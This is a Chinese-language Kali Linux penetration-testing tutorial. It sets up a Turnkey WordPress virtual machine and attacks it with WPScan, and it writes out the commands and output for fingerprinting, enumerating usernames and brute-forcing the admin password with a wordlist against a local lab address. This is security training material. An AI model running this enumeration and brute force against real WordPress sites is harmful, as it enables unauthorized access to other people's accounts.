1. 首页
  2. 网络安全技术

Kali安全渗透教程第3.2课:攻击WordPress和其他应用程序

Kali安全渗透教程第3.2课:攻击WordPress和其他应用程序

今天越来越多的企业利用SAAS(Software as a Service)工具应用在他们的业务中。例如,他们经常使用WordPress作为他们网站的内容管理系统,或者在局域网中使用Drupal框架。从这些应用程序中找到漏洞,是非常有价值的。

为了收集用于测试的应用程序,Turnkey Linux是一个非常好的资源。Turnkey工具的官方网站是http://www.turnkeylinux.org。本节将下载最流行的WordPress Turnkey Linux发行版。

获取WordPress应用程序的具体操作步骤如下所示。

1.在浏览器中输入http://www.turnkeylinux.org,从该界面下载Turnkey Linux。

2.在该页面列出了许多程序,并通过工具对这些应用程序来测试用户的技术。本例中将选择测试WordPress,向下滚动鼠标可以看到Instant Search对话框。

3.在该对话框中输入WordPress,然后按下回车键。

4.在该界面可以看到WordPress程序已经找到,此时单击WordPress-Blog Publishing Platform链接进入下载页面。

5.该界面提示为了安全,需要填写一个邮箱地址。填写完后,单击Subscribe and go straight to download按钮,将开始下载Turnkey WordPress软件。

上一小节介绍了WordPress虚拟机的安装。现在就可以启动WordPress虚拟机,在Kali Linux下使用WPScan攻击它。WPScan是一个黑盒安全扫描器,它允许用户查找Word Press安装版的一些已知的安全漏洞。本小节将介绍使用WPScan工具攻击WordPress应用程序。

WPScan在Kali Linux中已经默认安装。它的语法格式如下所示:

wpscan [选项] [测试]

常用的选项如下所示。

  • –update:更新到最新版本。
  • –url|-u <target url>:指定扫描WordPress的URL(统一资源定位符)或域名。
  • –force |-f:如果远程站点正运行WordPress,强制WPScan不检查。
  • –enumerate |-e [option(s)]:计算。该参数可用的选项有u、u[10-20]、p、vp、ap、tt、t、vt和at。其中u表示用户名从id1到10;u[10-20]表示用户名从id10到20([]中的字符必须写);p表示插件程序;vp表示仅漏洞插件程序;ap表示所有插件程序(可能需要一段时间);tt表示timthumbs;t表示主题;vt表示仅漏洞主题;at表示所有主题(可能需要一段时间)。

【实例3-1】使用WPScan攻击WordPress程序的具体操作步骤如下所示。

(1)在Kali Linux下,查看WPScan的帮助信息。执行命令如下所示:

root@localhost:~# wpscan -h 
_______________________________________________________________ 
        __          _______   _____                   
        \ \        / /  __ \ / ____|                  
         \ \  /\   / /| |__) | (___   ___  __ _ _ __   
          \ \/  \/ / |  ___/ \___  \ / __|/ _` | '_ \  
           \  /\  /  | |     ____) | (__| (_| | | | | 
            \/  \/   |_|    |_____/ \___|\__,_|_| |_| 

        WordPress Security Scanner by the WPScan Team  
                        Version v2.2 
     Sponsored by the RandomStorm Open Source Initiative 
  @_WPScan_, @ethicalhack3r, @erwan_lr, @gbrindisi, @_FireFart_ 
_______________________________________________________________ 

Help : 

Some values are settable in conf/browser.conf.json : 
  user-agent, proxy, proxy-auth, threads, cache timeout and request timeout 
...... 
m conf/browser.conf.json). 
--basic-auth <username:password>  Set the HTTP Basic authentication 
--wordlist | -w <wordlist>  Supply a wordlist for the password bruter and do the brute. 
--threads  | -t <number of threads>  The number of threads to use when multi-threading 
requests. (will override the value from conf/browser. conf.json) 
--username | -U <username>  Only brute force the supplied username. 
--help     | -h This help screen. 
--verbose  | -v Verbose output. 

Examples : 

-Further help ... 
ruby ./wpscan.rb --help 

-Do 'non-intrusive' checks ... 
ruby ./wpscan.rb --url www.example.com 

-Do wordlist password brute force on enumerated users using 50 threads ... 
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50 

-Do wordlist password brute force on the 'admin' username only ... 
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin
......

执行以上命令后,会输出大量信息。输出的信息中显示了WPScan的版本信息、使用方法及WPScan的例子等。由于篇幅的原因,这里贴了一部分内容,其他使用省略号(……)取代。

(2)使用WPScan攻击WordPress虚拟机。本例中,WordPress的IP地址是192.168.41.130。执行命令如下所示:

root@localhost:~# wpscan -u 192.168.41.130 
_______________________________________________________________ 
        __          _______   _____                   
        \ \        / /  __ \ / ____|                  
         \ \  /\  / /| |__) | (___   ___  __ _ _ __   
          \ \/  \/ /| ___/  \___ \ / __|/ _` | '_ \  
           \  /\  /  | |     ____) | (__| (_| | | | | 
            \/  \/   |_|    |_____/ \___|\__,_|_| |_| 

        WordPress Security Scanner by the WPScan Team  
                        Version v2.2 
     Sponsored by the RandomStorm Open Source Initiative 
  @_WPScan_, @ethicalhack3r, @erwan_lr, @gbrindisi, @_FireFart_ 
_______________________________________________________________ 

| URL: http://192.168.41.130/ 
| Started: Thu Apr 17 13:49:37 2014 

[!] The WordPress 'http://192.168.41.130/readme.html' file exists 
[+] Interesting header: SERVER: Apache/2.2.22 (Debian) 
[+] Interesting header: X-POWERED-BY: PHP/5.4.4-14+deb7u8 
[+] XML-RPC Interface available under: http://192.168.41.130/xmlrpc.php 
[+] WordPress version 3.6.1 identified from meta generator 

[+] WordPress theme in use: twentythirteen v1.0 

  | Name: twentythirteen v1.0 
 | Location: http://192.168.41.130/wp-content/themes/twentythirteen/ 

[+] Enumerating plugins from passive detection ...  
No plugins found 

[+] Finished: Thu Apr 17 13:49:41 2014 
[+] Memory used: 2.414 MB 
[+] Elapsed time: 00:00:03

输出的信息显示了WPScan一个简单的攻击过程。

(3)列出用户名列表,执行命令如下所示:

root@localhost:~# wpscan -u 192.168.41.130 -e u vp 
_______________________________________________________________ 
        __          _______   _____                   
        \ \        / /  __ \ / ____|                  
         \ \  /\  / /| |__) | (___   ___  __ _ _ __   
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \  
           \  /\  /  | |     ____) | (__| (_| | | | | 
            \/  \/   |_|    |_____/ \___|\__,_|_| |_| 

        WordPress Security Scanner by the WPScan Team  
                        Version v2.2 
     Sponsored by the RandomStorm Open Source Initiative 
  @_WPScan_, @ethicalhack3r, @erwan_lr, @gbrindisi, @_FireFart_ 
_______________________________________________________________ 

| URL: http://192.168.41.130/ 
| Started: Thu Apr 17 13:50:49 2014 

[!] The WordPress 'http://192.168.41.130/readme.html' file exists 
[+] Interesting header: SERVER: Apache/2.2.22 (Debian) 
[+] Interesting header: X-POWERED-BY: PHP/5.4.4-14+deb7u8 
[+] XML-RPC Interface available under: http://192.168.41.130/xmlrpc.php 
[+] WordPress version 3.6.1 identified from meta generator 

[+] WordPress theme in use: twentythirteen v1.0 

  | Name: twentythirteen v1.0 
 | Location: http://192.168.41.130/wp-content/themes/twentythirteen/ 

[+] Enumerating plugins from passive detection ...  
No plugins found 

[+] Enumerating usernames ... 
[+] We found the following 1 user/s: 
    +----+-------+-------+ 
    | Id | Login | Name  | 
    +----+-------+-------+ 
    | 1  | admin | admin | 
    +----+-------+-------+ 

[+] Finished: Thu Apr 17 13:50:54 2014 
[+] Memory used: 2.379 MB 
[+] Elapsed time: 00:00:04

从输出的信息中可以看到当前系统中只有一个用户,名为admin。

(4)为WPScan指定一个wordlist文件,使用–wordlist <path to file>选项。执行命令如下所示:

root@localhost:~# wpscan -u 192.168.41.130 -e u --wordlist /root/ wordlist.txt  
_______________________________________________________________ 
        __          _______   _____                   
        \ \        / /  __ \ / ____|                  
         \ \  /\  / /| |__) | (___   ___  __ _ _ __   
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \  
           \  /\  /  | |     ____) | (__| (_| | | | | 
            \/  \/   |_|    |_____/ \___|\__,_|_| |_| 

        WordPress Security Scanner by the WPScan Team  
                        Version v2.2 
     Sponsored by the RandomStorm Open Source Initiative 
  @_WPScan_, @ethicalhack3r, @erwan_lr, @gbrindisi, @_FireFart_ 
_______________________________________________________________ 

| URL: http://192.168.41.130/ 
| Started: Thu Apr 17 13:54:51 2014 

[!] The WordPress 'http://192.168.41.130/readme.html' file exists 
[+] Interesting header: SERVER: Apache/2.2.22 (Debian) 
[+] Interesting header: X-POWERED-BY: PHP/5.4.4-14+deb7u8 
[+] XML-RPC Interface available under: http://192.168.41.130/xmlrpc.php 
[+] WordPress version 3.6.1 identified from meta generator 

[+] WordPress theme in use: twentythirteen v1.0 

  | Name: twentythirteen v1.0 
 | Location: http://192.168.41.130/wp-content/themes/twentythirteen/ 

[+] Enumerating plugins from passive detection ...  
No plugins found 

[+] Enumerating usernames ... 
[+] We found the following 1 user/s: 
    +----+-------+-------+ 
    | Id | Login | Name  | 
    +----+-------+-------+ 
    | 1  | admin | admin | 
    +----+-------+-------+ 

[+] Starting the password brute forcer 
  Brute Forcing 'admin' Time: 00:00:00 <     > (59 / 20575)  0.28%       
  ETA: 00:00:00 
  [SUCCESS] Login : admin Password : 123456 

  +----+-------+-------+----------+ 
  | Id | Login | Name  | Password | 
  +----+-------+-------+----------+ 
  | 1  | admin | admin | 123456   | 
  +----+-------+-------+----------+ 

[+] Finished: Thu Apr 17 13:54:56 2014 
[+] Memory used: 2.508 MB 
[+] Elapsed time: 00:00:05

从输出的信息中,可以看到WordPress用户admin的密码已被破解出。

文章来源:【安全时代】 原文链接:https://www.agesec.com/article/6007.html

安全时代全部内容仅适用于网络安全技术爱好者学习研究,学习中请遵循国家相关法律法规。

安全时代全部数据来源互联网,不代表安全时代立场,如侵犯您权益可邮箱联系我们,详情:版权纠纷

发表评论

电子邮件地址不会被公开。 必填项已用*标注